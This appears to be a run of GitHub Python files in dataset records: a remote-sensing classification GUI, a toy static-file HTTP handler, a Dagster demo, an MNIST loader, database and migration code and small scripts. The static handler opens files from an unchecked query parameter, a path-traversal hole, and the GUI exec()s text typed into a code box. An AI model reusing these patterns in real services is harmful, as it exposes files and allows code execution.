self.uiType1VectorClassification_.currentLayer()\r\n if qgsRaster is None:\r\n self.log('Error: no raster selected')\r\n return\r\n if qgsClassification is None:\r\n self.log('Error: no classification selected')\r\n return\r\n raster = Raster(filename=qgsRaster.source())\r\n elif self.uiTrainingType_.currentIndex() == 2: # speclib\r\n raster = Raster(filename=self.filenameTmpRaster())\r\n else:\r\n assert 0\r\n\r\n colors = list()\r\n for w in self.colors:\r\n hex = w.styleSheet().split(' ')[1]\r\n colors.append(Color(hex))\r\n\r\n names = list()\r\n for w in self.names:\r\n names.append(w.text())\r\n\r\n classDefinition = ClassDefinition(names=names, colors=colors)\r\n\r\n classification = Classification(filename=self.filenameTmpClassification(), classDefinition=classDefinition)\r\n\r\n #if not raster.grid().equal(other=classification.grid()):\r\n # self.log('Error: raster and reference grids do not match')\r\n # return\r\n\r\n sample = ClassificationSample(raster=raster, classification=classification)\r\n\r\n qgsRaster2 = self.uiRaster2_.currentLayer()\r\n if (saveClassification or saveProbability) and (qgsRaster2 is None):\r\n self.log('Error: no raster for mapping selected')\r\n return\r\n raster2 = Raster(filename=qgsRaster2.source())\r\n\r\n qgsMask2 = self.uiMask_.currentLayer()\r\n if isinstance(qgsMask2, QgsRasterLayer):\r\n mask2 = Mask(filename=qgsMask2.source())\r\n if not raster.grid().equal(other=mask2.grid()):\r\n self.log('Error: raster and mask grids do not match')\r\n return\r\n elif isinstance(qgsMask2, QgsVectorLayer):\r\n mask2 = VectorMask(filename=qgsMask2.source())\r\n elif qgsMask2 is None:\r\n mask2 = None\r\n else:\r\n assert 0\r\n\r\n n = [spinbox.value() for spinbox 
in self.spinboxes]\r\n            if np.sum(n) == np.sum(self.counts): # perform no random sampling if all samples are used\r\n                n = None\r\n\r\n            cv = self.uiNFold_.value()\r\n\r\n            namespace = dict()\r\n            code = self.uiCode_.toPlainText()\r\n            exec(code, namespace)\r\n            sklEstimator = namespace['estimator']\r\n            classifier = Classifier(sklEstimator=sklEstimator)\r\n\r\n            self.uiExecute_.setEnabled(False)\r\n\r\n            classificationWorkflow(sample=sample,\r\n                                   classifier=classifier,\r\n                                   raster=raster2,\r\n                                   mask=mask2,\r\n                                   n=n,\r\n                                   cv=cv,\r\n                                   saveSampledClassification=saveSampledClassification,\r\n                                   saveSampledClassificationComplement=saveSampledClassificationComplement,\r\n                                   saveModel=saveModel,\r\n                                   saveClassification=saveClassification,\r\n                                   saveProbability=saveProbability,\r\n                                   saveRGB=saveRGB,\r\n                                   saveReport=saveReport,\r\n                                   filenameSampledClassification=filenameSampledClassification,\r\n                                   filenameSampledClassificationComplement=filenameSampledClassificationComplement,\r\n                                   filenameModel=filenameModel,\r\n                                   filenameClassification=filenameClassification,\r\n                                   filenameProbability=filenameProbability,\r\n                                   filenameReport=filenameReport,\r\n                                   ui=self)\r\n            self.log('Done!')\r\n            self.progressBar().setPercentage(0)\r\n            self.uiExecute_.setEnabled(True)\r\n\r\n\r\n        except Exception as error:\r\n            traceback.print_exc()\r\n            self.log('Error: {}'.format(str(error)))\r\n            self.uiExecute_.setEnabled(True)\r\n\r\n\r\nclass CategoryFieldSelectionDialog(QDialog):\r\n\r\n    def __init__(self, layer: QgsVectorLayer, *args, **kwargs):\r\n        super(CategoryFieldSelectionDialog, self).__init__(*args, **kwargs)\r\n        self.setWindowTitle('Invalid Vector Classification')\r\n        self.layer = layer\r\n\r\n        QBtn = QDialogButtonBox.Ok | QDialogButtonBox.Cancel\r\n        self.buttonBox = QDialogButtonBox(QBtn)\r\n        self.buttonBox.accepted.connect(self.accept)\r\n        self.buttonBox.rejected.connect(self.reject)\r\n        self.field = QgsFieldComboBox()\r\n        self.field.setLayer(layer=layer)\r\n        self.field.setCurrentIndex(0)\r\n        self.field.setAllowEmptyFieldName(False)\r\n        self.checkBox = QCheckBox('Open layer styling dialog for changing class names and colors?')\r\n        self.checkBox.setChecked(True)\r\n        self.layout = QVBoxLayout()\r\n        self.layout.addWidget(QLabel('Selected layer is not a well defined vector classification.'))\r\n        self.layout.addWidget(QLabel('This can be fixed by changing the layer styling to categorized rendering.'))\r\n        self.layout.addWidget(QLabel(''))\r\n        self.layout.addWidget(QLabel('Please select a value field used for categorization.'))\r\n        self.layout.addWidget(self.field)\r\n        self.layout.addWidget(self.checkBox)\r\n        self.layout.addWidget(self.buttonBox)\r\n        self.setLayout(self.layout)\r\n        self.resize(300, 50)\r\n\r\n    @staticmethod\r\n    def openLayerPropertiesDialog(layer: QgsVectorLayer, parent: QWidget):\r\n        from enmapbox.qgispluginsupport.qps.layerproperties import showLayerPropertiesDialog\r\n        dialog = showLayerPropertiesDialog(layer, parent=parent, modal=False)\r\n        dialog.mOptionsListWidget.setCurrentRow(2)\r\n        dialog.setModal(True)\r\n        dialog.exec_()\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapbox/coreapps/_classic/classificationapp/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":22485,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"}
{"seq_id":"22291571387","text":"def static(request):\n    \"\"\"\n    Handler for static assets: read the requested static file and build the HTTP response.\n    \"\"\"\n    filename = request.query.get('file')\n    path = 'static/' + filename\n    with open(path, 'rb') as f:\n        header = b'HTTP/1.1 200 OK\\r\\n\\r\\n'\n        r = 
header + f.read()\n    return r\n\n\n# route dictionary\n# key is the route (a route is just the path)\n# value is the handler for that route (it produces the response)\nroute_dict = {\n    '/static': static,\n}","repo_name":"realRichard/TodoList","sub_path":"routes/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"28885385471","text":"'''\nThis demo example is to demonstrate that it is possible to construct\nthe dependencies of a pipeline definition from a yaml file or similar.\nThis is not the \"blessed\" file format nor is it our recommendation for\ndoing things. However we've been asked a number of times if this is possible\nand this should serve as a reasonable template to build upon. \n'''\nfrom dagster import (\n    DependencyDefinition,\n    PipelineDefinition,\n    SolidInvocation,\n    check,\n    file_relative_path,\n    solid,\n)\nfrom dagster.utils import load_yaml_from_path\n\n\n@solid\ndef add_one(_, num: int) -> int:\n    return num + 1\n\n\n@solid\ndef add_two(_, num: int) -> int:\n    return num + 2\n\n\n@solid\ndef add(_, left: int, right: int) -> int:\n    return left + right\n\n\ndef construct_pipeline_with_yaml(yaml_file, solid_defs):\n    yaml_data = load_yaml_from_path(yaml_file)\n    solid_def_dict = {s.name: s for s in solid_defs}\n\n    deps = {}\n\n    for solid_yaml_data in yaml_data['pipeline']['solids']:\n        check.invariant(solid_yaml_data['def'] in solid_def_dict)\n        def_name = solid_yaml_data['def']\n        alias = solid_yaml_data.get('alias', def_name)\n        solid_deps_entry = {}\n        for input_name, input_data in solid_yaml_data.get('deps', {}).items():\n            solid_deps_entry[input_name] = DependencyDefinition(\n                solid=input_data['solid'], output=input_data.get('output', 'result')\n            )\n        deps[SolidInvocation(name=def_name, alias=alias)] = solid_deps_entry\n\n    return PipelineDefinition(\n        name=yaml_data['pipeline']['name'],\n        description=yaml_data['pipeline'].get('description'),\n        solid_defs=solid_defs,\n        dependencies=deps,\n    )\n\n\ndef define_dep_dsl_pipeline():\n    return construct_pipeline_with_yaml(\n        file_relative_path(__file__, 'example.yaml'), [add_one, add_two, add]\n    )\n","repo_name":"konradmalik/tech-sandbox","sub_path":"Dagster/data/airline-demo/dagster_examples/dep_dsl/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"17766463969","text":"import numpy as np \nimport random\nimport pdb\nimport sys\nimport time\nimport os\n\nfrom ml_from_scratch.coursera.mnist import train_images as get_train_images\nfrom ml_from_scratch.coursera.mnist import train_labels as get_train_labels\nfrom ml_from_scratch.coursera.mnist import test_images as get_test_images\nfrom ml_from_scratch.coursera.mnist import test_labels as get_test_labels\n\ndef init_subset(id):\n\n    #S = int(id) % 1000\n    S = int(id) % 210\n    \n    ### Create a subset of MNIST dataset with only 4 classes\n    num_classes = 4\n    sub_idx = np.sort(np.random.RandomState(seed=S).permutation(10)[:4])\n    train_sub_size = 500\n    test_sub_size = 100\n    train_images = get_train_images() #[60000, 28, 28]\n    train_labels = get_train_labels()\n    test_images = get_test_images()\n    test_labels = get_test_labels()\n\n    ### Preprocessing the data\n    print('Preparing data......')\n    train_images -= int(np.mean(train_images))\n    train_images = train_images // int(np.std(train_images))\n    test_images -= int(np.mean(test_images))\n    test_images = test_images // int(np.std(test_images))\n    \n    #pdb.set_trace()\n    
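# reshape the flat image stacks to NCHW layout: (samples, 1 channel, 28, 28)\n    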
training_data = train_images.reshape(60000, 1, 28, 28)\n testing_data = test_images.reshape(10000, 1, 28, 28)\n ### Generate the New subset of training and testing samples\n sub_training_images, sub_training_labels = subset_extraction(S, sub_idx, train_sub_size, training_data, train_labels, num_classes,train=True)\n sub_testing_images, sub_testing_labels = subset_extraction(S, sub_idx, test_sub_size, testing_data, test_labels, num_classes,train=False)\n return sub_training_images, sub_training_labels, sub_testing_images, sub_testing_labels\n \n### Function of creating the subset of MNIST dataset\ndef subset_extraction(S, idx, sub_size, images, labels, num_classes, train=True):\n temp_img = []\n temp_labels = []\n for i in range(num_classes):\n ind = labels == idx[i]\n A = images[ind,:,:,:]\n A = A[:sub_size,:,:,:]\n temp_img.append(A)\n label_list = [i] * A.shape[0]\n temp_labels += label_list\n\n sub_images = np.vstack(temp_img)\n sub_labels = np.asarray(temp_labels)\n # shuffle the subset samples\n shuffle_idx = np.random.RandomState(seed=S).permutation(sub_images.shape[0])\n final_images = sub_images[shuffle_idx,:,:]\n final_labels = sub_labels[shuffle_idx]\n final_labels = np.eye(num_classes)[final_labels]\n return final_images, final_labels\n\nif __name__ == \"__main__\":\n init_subset(\"9000\")\n","repo_name":"necromuralist/Machine-Learning-From-Scratch","sub_path":"ml_from_scratch/coursera/precode.py","file_name":"precode.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72895406886","text":"import asyncio\nimport selectors\n\n\nclass LoopValidator:\n REQUIRED_METHODS = {'add_reader', 'remove_reader',\n 'add_writer', 'remove_writer'}\n\n @staticmethod\n def _get_working_loop():\n evloop = asyncio.get_event_loop()\n gen_new_loop = not LoopValidator._is_valid_loop(evloop)\n if gen_new_loop:\n evloop.close()\n selector = selectors.SelectSelector()\n new_loop = asyncio.SelectorEventLoop(selector)\n asyncio.set_event_loop(new_loop)\n return new_loop\n\n return evloop\n\n @staticmethod\n def _is_valid_loop(evloop):\n if not evloop:\n return False\n for meth in LoopValidator.REQUIRED_METHODS:\n abs_meth, actual_meth = (\n getattr(asyncio.AbstractEventLoop, meth), getattr(evloop.__class__, meth))\n if abs_meth == actual_meth:\n return False\n return True\n\n @staticmethod\n def get_event_loop(evloop):\n if LoopValidator._is_valid_loop(evloop):\n return evloop\n return LoopValidator._get_working_loop()\n\n @staticmethod\n def close_loop():\n evloop = asyncio.get_event_loop()\n evloop.close()\n\n\ndef get_event_loop(\n evloop=None, # type: asyncio.AbstractEventLoop\n):\n \"\"\"\n Get an event loop compatible with acouchbase.\n Some Event loops, such as ProactorEventLoop (the default asyncio event\n loop for Python 3.8 on Windows) are not compatible with acouchbase as\n they don't implement all members in the abstract base class.\n\n :param evloop: preferred event loop\n :return: The preferred event loop, if compatible, otherwise, a compatible\n alternative event loop.\n \"\"\"\n return LoopValidator.get_event_loop(evloop)\n","repo_name":"couchbase/couchbase-python-client","sub_path":"acouchbase/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"52"} +{"seq_id":"7179272258","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom 
fastadmin.system.api import users\nfrom fastadmin.system.schemas import Response,UsersCreate,Users\nfrom fastadmin.system.database import SessionLocal\nfrom fastadmin.utils.common.resp import respSuccessJson\n\n# Dependency\ndef get_db():\n    \"\"\"\n    Close the connection once the request has been handled; each request gets its own connection.\n    :return:\n    \"\"\"\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\nrouter = APIRouter(\n    prefix=\"/users\", # the prefix only applies within this module\n    tags=[\"users\"],\n)\n\n@router.post(\"/create\",response_model = Response[Users])\nasync def create_user(user: UsersCreate, db: Session = Depends(get_db)):\n    return respSuccessJson(users.db_create_user(db,user))\n\n@router.get(\"/users/me\")\nasync def read_user_me():\n    return {\"username\": \"zhangsan\"}","repo_name":"kejian-xu/fastadmin","sub_path":"fastadmin/system/router/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73414909284","text":"import matplotlib.pyplot as plt \nimport glob \nimport os\n\n# files = glob.glob('C:\\研究室\\みんなのアイデア\\予備実験結果\\*')\n\npath = 'C:\\研究室\\みんなのアイデア\\内藤洗濯機1203.txt'\nwords = []\n\nwith open(path, encoding='utf_8') as file:\n    index = 0\n    for s in file:\n        line = str(index)+' '+s\n        words.append(line)\n        index += 1\n        print(s)\n        # line = list(s.strip().split())\n        # if len(line) == 1:\n        #     continue\n        # line.insert(0,str(index))\n        # line.append('\\n')\n        # words.append(line)\n        # index += 1\n# print(words)\nwith open(path,'a',encoding='utf_8') as file:\n    for i in range(len(words)):\n        if i == 0:\n            continue\n        file.write(words[i])\n\n","repo_name":"yamayamaKo/python_lab","sub_path":"フォーマットを整える.py","file_name":"フォーマットを整える.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"35831344665","text":"import argparse\nfrom apitep_utils import ETL, ArgumentParserHelper\nimport logging\n\nimport keys\nfrom data_model.school_kind import SchoolKind\n\nlog = logging.getLogger(__name__)\n\n\nclass DataAcquisitionDV(ETL):\n    school_kind: SchoolKind = None\n\n    def parse_arguments(self):\n        \"\"\"\n        Parse arguments provided via command line, and check if they are valid\n        or not. 
Adequate defaults are provided when possible.\n\n Parsed arguments are:\n - paths to the input CSV datasets, separated with spaces.\n - path to the output CSV dataset.\n \"\"\"\n\n log.info(\"Get integration arguments\")\n log.debug(\"Integration.parse_arguments()\")\n\n program_description = self.description\n argument_parser = argparse.ArgumentParser(description=program_description)\n argument_parser.add_argument(\"-i\", \"--input_paths\",\n required=True,\n nargs=\"+\",\n help=\"path to the input CSV datasets\")\n argument_parser.add_argument(\"-o\", \"--output_path\", required=True,\n help=\"path to the output CSV dataset\")\n argument_parser.add_argument(\"-s\", \"--school_kind\", required=True,\n help=\"school kind to analyze\")\n\n arguments = argument_parser.parse_args()\n input_path_segments = arguments.input_paths\n self.input_path_segments = []\n for input_path_segment in input_path_segments:\n self.input_path_segments.append(\n ArgumentParserHelper.parse_data_file_path(\n data_file_path=input_path_segment)\n )\n self.output_path_segment = ArgumentParserHelper.parse_data_file_path(\n data_file_path=arguments.output_path,\n check_is_file=False)\n school_kind_str = arguments.school_kind\n if school_kind_str == \"Teaching\":\n self.school_kind = SchoolKind.Teaching\n elif school_kind_str == \"Polytechnic\":\n self.school_kind = SchoolKind.Polytechnic\n\n @ETL.stopwatch\n def process(self):\n \"\"\"\n Process record personal data\n \"\"\"\n log.info(\"Data acquisition of record_personal_access data for data visualization of school: \" +\n self.school_kind.value)\n log.debug(\"DataAcquisitionDV.process()\")\n\n target_courses = ['2015-16', '2016-17', '2017-18', '2018-19', '2019-20', '2020-21']\n\n rows_before = len(self.input_dfs[0].index)\n self.input_dfs[0] = self.input_dfs[0][self.input_dfs[0][keys.OPEN_YEAR_PLAN_KEY].isin(target_courses)]\n rows_after = len(self.input_dfs[0].index)\n self.changes[\"get only target courses for visualization\"] = rows_before - rows_after\n\n log.info(\"columns of final dataset are:\" + str(self.input_dfs[0].columns))\n log.info(\"final number of rows: \" + str(len(self.input_dfs[0].index)))\n self.output_df = self.input_dfs[0]\n\n\ndef main():\n logging.basicConfig(\n filename=\"debug.log\",\n level=logging.DEBUG,\n format=\"%(asctime)-15s %(levelname)8s %(name)s %(message)s\")\n logging.getLogger(\"matplotlib\").setLevel(logging.ERROR)\n\n log.info(\"--------------------------------------------------------------------------------------\")\n log.info(\"Start DataAcquisitionDV\")\n log.debug(\"main()\")\n\n etl = DataAcquisitionDV(\n input_separator=\"|\",\n output_separator=\"|\",\n save_report_on_save=False,\n save_report_on_load=False,\n )\n etl.execute()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"franjmelchor/education_drop","sub_path":"Code/Data_Visualization/Data_Acquisition/dv_data_acquisition.py","file_name":"dv_data_acquisition.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28251419717","text":"import os\n\n\ndef part_1(input):\n total = 0\n for value in input:\n total += int(value / 3) - 2\n return total\n\n\ndef part_2(input):\n total = 0\n for value in input:\n while value > 0:\n value = int(value / 3) - 2\n if value > 0:\n total += value\n return total\n\n\nif __name__ == \"__main__\":\n filename = os.path.splitext(os.path.dirname(__file__))[\n 0] + 'inputs/01.in'\n input = open(filename).readlines()\n int_list = 
[int(x) for x in input]\n print(\"part 1: \", part_1(int_list))\n print(\"part 2: \", part_2(int_list))\n","repo_name":"jcockbain/advent-of-code-17-19","sub_path":"2019/day_01.py","file_name":"day_01.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71034769764","text":"\"\"\"--- Day 7: No Space Left On Device ---\r\nYou can hear birds chirping and raindrops hitting leaves as the expedition proceeds. Occasionally, you can even hear much louder sounds in the distance; how big do the animals get out here, anyway?\r\n\r\nThe device the Elves gave you has problems with more than just its communication system. You try to run a system update:\r\n\r\n$ system-update --please --pretty-please-with-sugar-on-top\r\nError: No space left on device\r\nPerhaps you can delete some files to make space for the update?\r\n\r\nYou browse around the filesystem to assess the situation and save the resulting terminal output (your puzzle input). For example:\r\n\r\n$ cd /\r\n$ ls\r\ndir a\r\n14848514 b.txt\r\n8504156 c.dat\r\ndir d\r\n$ cd a\r\n$ ls\r\ndir e\r\n29116 f\r\n2557 g\r\n62596 h.lst\r\n$ cd e\r\n$ ls\r\n584 i\r\n$ cd ..\r\n$ cd ..\r\n$ cd d\r\n$ ls\r\n4060174 j\r\n8033020 d.log\r\n5626152 d.ext\r\n7214296 k\r\nThe filesystem consists of a tree of files (plain data) and directories (which can contain other directories or files). The outermost directory is called /. You can navigate around the filesystem, moving into or out of directories and listing the contents of the directory you're currently in.\r\n\r\nWithin the terminal output, lines that begin with $ are commands you executed, very much like some modern computers:\r\n\r\ncd means change directory. This changes which directory is the current directory, but the specific result depends on the argument:\r\ncd x moves in one level: it looks in the current directory for the directory named x and makes it the current directory.\r\ncd .. moves out one level: it finds the directory that contains the current directory, then makes that directory the current directory.\r\ncd / switches the current directory to the outermost directory, /.\r\nls means list. It prints out all of the files and directories immediately contained by the current directory:\r\n123 abc means that the current directory contains a file named abc with size 123.\r\ndir xyz means that the current directory contains a directory named xyz.\r\nGiven the commands and output in the example above, you can determine that the filesystem looks visually like this:\r\n\r\n- / (dir)\r\n - a (dir)\r\n - e (dir)\r\n - i (file, size=584)\r\n - f (file, size=29116)\r\n - g (file, size=2557)\r\n - h.lst (file, size=62596)\r\n - b.txt (file, size=14848514)\r\n - c.dat (file, size=8504156)\r\n - d (dir)\r\n - j (file, size=4060174)\r\n - d.log (file, size=8033020)\r\n - d.ext (file, size=5626152)\r\n - k (file, size=7214296)\r\nHere, there are four directories: / (the outermost directory), a and d (which are in /), and e (which is in a). These directories also contain files of various sizes.\r\n\r\nSince the disk is full, your first step should probably be to find directories that are good candidates for deletion. To do this, you need to determine the total size of each directory. The total size of a directory is the sum of the sizes of the files it contains, directly or indirectly. 
(Directories themselves do not count as having any intrinsic size.)\r\n\r\nThe total sizes of the directories above can be found as follows:\r\n\r\nThe total size of directory e is 584 because it contains a single file i of size 584 and no other directories.\r\nThe directory a has total size 94853 because it contains files f (size 29116), g (size 2557), and h.lst (size 62596), plus file i indirectly (a contains e which contains i).\r\nDirectory d has total size 24933642.\r\nAs the outermost directory, / contains every file. Its total size is 48381165, the sum of the size of every file.\r\nTo begin, find all of the directories with a total size of at most 100000, then calculate the sum of their total sizes. In the example above, these directories are a and e; the sum of their total sizes is 95437 (94853 + 584). (As in this example, this process can count files more than once!)\r\n\r\nFind all of the directories with a total size of at most 100000. What is the sum of the total sizes of those directories?\"\"\"\r\n\r\n# Solution\r\n\r\n# change directory to this file's directory\r\nimport os\r\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n\r\n# read input\r\nwith open('input.txt', 'r') as file:\r\n\tinput = file.read().splitlines()\r\n\r\n# import anytree\r\nfrom anytree import Node, RenderTree\r\n\r\n# create root node\r\nroot = Node('/')\r\nroot.size = 0\r\n\r\n# set current node to root\r\ncurrent = root\r\n\r\n# create nodes\r\nfor line in input:\r\n\t# split line into tokens\r\n\ttokens = line.split(' ')\r\n\t# if line is command\r\n\tif tokens[0] == '$':\r\n\t\t# if command is cd\r\n\t\tif tokens[1] == 'cd':\r\n\t\t\t# if argument is ..\r\n\t\t\tif tokens[2] == '..':\r\n\t\t\t\t# move up one level\r\n\t\t\t\tcurrent = current.parent\r\n\t\t\t# if argument is /\r\n\t\t\telif tokens[2] == '/':\r\n\t\t\t\t# move to root\r\n\t\t\t\tcurrent = root\r\n\t\t\t# if argument is directory\r\n\t\t\telse:\r\n\t\t\t\t# move to directory\r\n\t\t\t\t# current = current.children[tokens[2]]\r\n\t\t\t\t# but children is a tuple and must use index\r\n\t\t\t\t# so we have to do this instead\r\n\t\t\t\tfor child in current.children:\r\n\t\t\t\t\tif child.name == tokens[2]:\r\n\t\t\t\t\t\tcurrent = child\r\n\t\t\t\t\t\tbreak\r\n\t# if line is directory\r\n\telif tokens[0] == 'dir':\r\n\t\t# create directory and add to current node\r\n\t\t# current.children.append(Node(tokens[1]))\r\n\t\t# but children is a tuple and has no append method\r\n\t\t# so we have to do this instead\r\n\t\tcurrent.children = current.children + (Node(tokens[1], size=0),)\r\n\t# if line is file\r\n\telse:\r\n\t\t# create file and add to current node\r\n\t\tfile = Node(tokens[1], size=int(tokens[0]))\r\n\t\t# current.children.append(file)\r\n\t\t# but children is a tuple and has no append method\r\n\t\t# so we have to do this instead\r\n\t\tcurrent.children = current.children + (file,)\r\n\r\n# calculate total size of each node recursively\r\ndef calculate_total_size(node):\r\n\t# if node is directory\r\n\tif node.is_leaf == False:\r\n\t\t# for each child of node\r\n\t\tfor child in node.children:\r\n\t\t\t# calculate child's total size\r\n\t\t\tcalculate_total_size(child)\r\n\t\t\t# add child's total size to node's total size\r\n\t\t\tnode.size += child.size\r\n\r\ncalculate_total_size(root)\r\n\r\n# render tree\r\n# for pre, fill, node in RenderTree(root):\r\n# \tprint(\"%s%s %s\" % (pre, node.name, node.size if hasattr(node, 'size') else ''))\r\n\r\n# find all directories with total size <= 100000\r\n# and calculate sum of 
their total sizes\r\nsum = 0\r\nfor pre, fill, node in RenderTree(root):\r\n\t# if node is directory\r\n\tif node.is_leaf == False:\r\n\t\t# if node has total size <= 100000\r\n\t\tif node.size <= 100000:\r\n\t\t\t# add node's total size to sum\r\n\t\t\tsum += node.size\r\n\r\n# print sum\r\nprint(sum)","repo_name":"Lefted/Advent-of-Code-2022","sub_path":"7/7a.py","file_name":"7a.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1003341613","text":"\"\"\"initial_migration\n\nRevision ID: cd6f78358781\nRevises: \nCreate Date: 2023-07-18 13:29:53.922013\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"v0.1.0\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"books\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"title\", sa.String(length=300), nullable=False),\n sa.Column(\"subtitle\", sa.String(length=300), nullable=True),\n sa.Column(\"published_date\", sa.String(length=30), nullable=True),\n sa.Column(\"publisher\", sa.String(length=100), nullable=False),\n sa.Column(\"description\", sa.Text(), nullable=True),\n sa.Column(\"image\", sa.Text(), nullable=True),\n sa.Column(\"original_source\", sa.String(length=30), nullable=False),\n sa.Column(\"external_id\", sa.String(length=30), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"title\", \"books\", [\"title\"], mysql_prefix='FULLTEXT')\n op.create_index(\"subtitle\", \"books\", [\"subtitle\"], mysql_prefix='FULLTEXT')\n op.create_index(\"published_date\", \"books\", [\"published_date\"], mysql_prefix='FULLTEXT')\n op.create_index(\"publisher\", \"books\", [\"publisher\"], mysql_prefix='FULLTEXT')\n op.create_index(\"description\", \"books\", [\"description\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"authors\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"name\", sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"name\", \"authors\", [\"name\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"categories\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"name\", sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"name\", \"categories\", [\"name\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"book_authors\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"book_id\", sa.Integer(), sa.ForeignKey('books.id', ondelete='CASCADE'), nullable=False),\n sa.Column(\"author_id\", sa.Integer(), sa.ForeignKey('authors.id'), nullable=False),\n sa.UniqueConstraint(\"book_id\", \"author_id\")\n )\n op.create_table(\n \"book_categories\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"book_id\", sa.Integer(), 
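# ondelete='CASCADE' drops join rows automatically when the referenced book is deleted\n            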
sa.ForeignKey('books.id', ondelete='CASCADE'), nullable=False),\n sa.Column(\"category_id\", sa.Integer(), sa.ForeignKey('categories.id'), nullable=False),\n sa.UniqueConstraint(\"book_id\", \"category_id\")\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"books\")\n op.drop_table(\"authors\")\n op.drop_table(\"categories\")\n op.drop_table(\"book_authors\")\n op.drop_table(\"book_categories\")\n # ### end Alembic commands ###\n","repo_name":"asgutierrez/library","sub_path":"r5/Migration/versions/0.1.0.py","file_name":"0.1.0.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24078054011","text":"import hashlib, os, sys\nfrom fs import mkdirs, dirname #, filePutContents, fileGetContents\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n\"\"\"\n@description A static singleton-esque file-based key/value cache.\n\n@date 2012-04-19\n\"\"\"\n\nCACHE_BASE_PATH = '%s/.cache/wget' % dirname(sys.argv[0])\n\ndef set(key, data):\n #print 'storing %s => %s' % (key, data)\n filePath = _constructPathFromKey(key)\n parentPath = dirname(filePath)\n if not os.path.exists(parentPath):\n mkdirs(parentPath)\n with open(filePath, 'w') as fh:\n return pickle.dump(data, fh) #filePutContents(_constructPathFromKey(key), data)\n\ndef get(key):\n try:\n with open(_constructPathFromKey(key), 'r') as fh:\n return pickle.load(fh) #fileGetContents(_constructPathFromKey(key))\n except IOError:\n return None\n\ndef _constructPathFromKey(key):\n k = hashlib.md5(key).hexdigest()\n #print '%s/%s/%s/%s' % (CACHE_BASE_PATH, k[0], k[1], k)\n return '%s/%s/%s/%s' % (CACHE_BASE_PATH, k[0], k[1], k)\n\n","repo_name":"sleaze/sleazy-indexing-utils","sub_path":"lib/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"17979867140","text":"\"\"\"\ntransformer text classifier\n\nconda activate rasy-pDL\nnohup python transformer_classfier.py -m baseline_word_split_replace_nums -d /data/work/may28/ --device 0 --word_split True --replace_nums True> baseline_word_split_replace_nums.log &\n\nauthor: Syed Rahman\n\"\"\"\n\nimport numpy as np\nimport torch\nfrom text_cleaner import normalize\nfrom torchtext.utils import download_from_url, unicode_csv_reader\nfrom torchtext.data import Field, TabularDataset, BucketIterator, Dataset, Example\nimport torchtext.datasets as datasets\nimport torchtext.data as data\nimport torchtext\nimport torch.nn.functional as f\nfrom torch import nn\nimport copy\nimport io\nimport os\nimport sys\nimport pandas as pd\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-m\", \"--model_name\", type=str, help=\"model 